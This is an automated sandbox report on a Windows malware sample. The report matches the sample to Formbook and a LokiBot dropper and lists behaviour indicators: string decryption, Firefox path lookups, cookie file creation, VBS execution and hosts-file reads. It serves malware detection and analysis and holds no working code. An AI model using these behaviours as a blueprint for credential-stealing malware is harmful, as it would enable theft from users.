Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB936AC5_2_1EB936AC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB77C85_2_1EBB77C8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB644FC5_2_1EB644FC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBC24E15_2_1EBC24E1
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB8E4D75_2_1EB8E4D7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC304045_2_1EC30404
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB645A5_2_1EBB645A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB8C4475_2_1EB8C447
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBBB5945_2_1EBBB594
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC265005_2_1EC26500
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB683EB5_2_1EB683EB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC2B0E75_2_1EC2B0E7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC250A55_2_1EC250A5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF4DFD47_2_1EF4DFD4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF91FDB7_2_1EF91FDB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF77FAB7_2_1EF77FAB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF29F907_2_1EF29F90
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE7F647_2_1EFE7F64
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF4DCFB7_2_1EF4DCFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF85CCD7_2_1EF85CCD
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE5C567_2_1EFE5C56
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF8FC467_2_1EF8FC46
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF75DD87_2_1EF75DD8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFCDD517_2_1EFCDD51
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFD1AB87_2_1EFD1AB8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF79A687_2_1EF79A68
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF8FBA67_2_1EF8FBA6
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFCDB957_2_1EFCDB95
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE78EA7_2_1EFE78EA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF439847_2_1EF43984
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF9B9747_2_1EF9B974
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF939517_2_1EF93951
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF7595C7_2_1EF7595C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE19077_2_1EFE1907
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF396B97_2_1EF396B9
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF536AC7_2_1EF536AC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF777C87_2_1EF777C8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF7B5947_2_1EF7B594
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF4153A7_2_1EF4153A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF872C37_2_1EF872C3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF2F2027_2_1EF2F202
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFEB0E77_2_1EFEB0E7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF530CF7_2_1EF530CF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE50A57_2_1EFE50A5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF270787_2_1EF27078
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFDB04D7_2_1EFDB04D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF770157_2_1EF77015
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF491F77_2_1EF491F7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF431097_2_1EF43109
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF9AEF57_2_1EF9AEF5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF3EEC77_2_1EF3EEC7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFD2EBA7_2_1EFD2EBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF30E527_2_1EF30E52
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF52CAF7_2_1EF52CAF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFCADC57_2_1EFCADC5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF72ADC7_2_1EF72ADC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF40BFB7_2_1EF40BFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE4BBA7_2_1EFE4BBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF2CBA77_2_1EF2CBA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFCEB7D7_2_1EFCEB7D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF528A37_2_1EF528A3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE88A27_2_1EFE88A2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFCC8897_2_1EFCC889
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF729EE7_2_1EF729EE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFF49907_2_1EFF4990
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF547367_2_1EF54736
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF244FC7_2_1EF244FC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF824E17_2_1EF824E1
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF4E4D77_2_1EF4E4D7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF7645A7_2_1EF7645A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF4C4477_2_1EF4C447
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFF04047_2_1EFF0404
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF525CB7_2_1EF525CB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFD85167_2_1EFD8516
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE65007_2_1EFE6500
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EFE22507_2_1EFE2250
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF283EB7_2_1EF283EB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF520EA7_2_1EF520EA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5DFD417_2_1ED5DFD4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDA1FDB17_2_1EDA1FDB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED39F9017_2_1ED39F90
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED87FAB17_2_1ED87FAB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF7F6417_2_1EDF7F64
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED95CCD17_2_1ED95CCD
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5DCFB17_2_1ED5DCFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF5C5617_2_1EDF5C56
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED9FC4617_2_1ED9FC46
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED85DD817_2_1ED85DD8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDDD5117_2_1EDDDD51
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDE1AB817_2_1EDE1AB8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED89A6817_2_1ED89A68
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDDB9517_2_1EDDDB95
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED9FBA617_2_1ED9FBA6
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF78EA17_2_1EDF78EA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5398417_2_1ED53984
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8595C17_2_1ED8595C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDA395117_2_1EDA3951
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDAB97417_2_1EDAB974
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF190717_2_1EDF1907
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED496B917_2_1ED496B9
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED636AC17_2_1ED636AC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED877C817_2_1ED877C8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8B59417_2_1ED8B594
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5153A17_2_1ED5153A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED972C317_2_1ED972C3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3F20217_2_1ED3F202
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED630CF17_2_1ED630CF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDFB0E717_2_1EDFB0E7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF50A517_2_1EDF50A5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDEB04D17_2_1EDEB04D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3707817_2_1ED37078
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8701517_2_1ED87015
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED591F717_2_1ED591F7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5310917_2_1ED53109
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED4EEC717_2_1ED4EEC7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDAAEF517_2_1EDAAEF5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDE2EBA17_2_1EDE2EBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED40E5217_2_1ED40E52
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED62CAF17_2_1ED62CAF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDADC517_2_1EDDADC5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED82ADC17_2_1ED82ADC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED50BFB17_2_1ED50BFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF4BBA17_2_1EDF4BBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3CBA717_2_1ED3CBA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDEB7D17_2_1EDDEB7D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDC88917_2_1EDDC889
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDAC88017_2_1EDAC880
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED628A317_2_1ED628A3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF88A217_2_1EDF88A2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED829EE17_2_1ED829EE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EE0499017_2_1EE04990
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED6473617_2_1ED64736
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5E4D717_2_1ED5E4D7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED344FC17_2_1ED344FC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED924E117_2_1ED924E1
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8645A17_2_1ED8645A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5C44717_2_1ED5C447
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EE0040417_2_1EE00404
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED625CB17_2_1ED625CB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDE851617_2_1EDE8516
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF650017_2_1EDF6500
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF225017_2_1EDF2250
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED383EB17_2_1ED383EB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED620EA17_2_1ED620EA
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EB93D00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EFBF3E2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF72824 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EB81ACE appears 88 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF72F3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED63D00 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED4F63B appears 256 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF41ACE appears 132 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED772D0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF53D00 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF3F63B appears 254 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EDCF3E2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED82F3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED51ACE appears 133 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EF672D0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EBB2824 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EBFF3E2 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1EB7F63B appears 188 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: String function: 1ED82824 appears 113 times
PE file contains strange resourcesShow sources
Source: ___ __ ___.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: ___ __ ___.exe, 00000000.00000002.959022514.003D0000.00000008.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000000.00000002.959317956.00426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000003.966535726.007BC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTJENESTE.exen vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968639132.01486000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.967922744.00360000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968324811.00740000.00000008.00000001.sdmpBinary or memory string: originalfilename vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968324811.00740000.00000008.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.1024691339.1DA00000.00000008.00000001.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ___ __ ___.exe
Source: ___ __ ___.exeBinary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\System32\msiexec.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\msiexec.exeSection loaded: mozglue.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winsqlite3.dllJump to behavior
Yara signature matchShow sources
Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@27/13@19/2
Creates files inside the program directoryShow sources
Source: C:\Windows\explorer.exeFile created: C:\Program Files\RutfJump to behavior
Creates files inside the user directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CTD93KMK.txtJump to behavior
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1Jump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.............T...;.......................................!...@@ .....7%.M........z....F.J....l...Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........T....n@.....V..J............T.......#..u(...&...`.....,.....Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: ___ __ ___.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\___ __ ___.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Reads ini filesShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
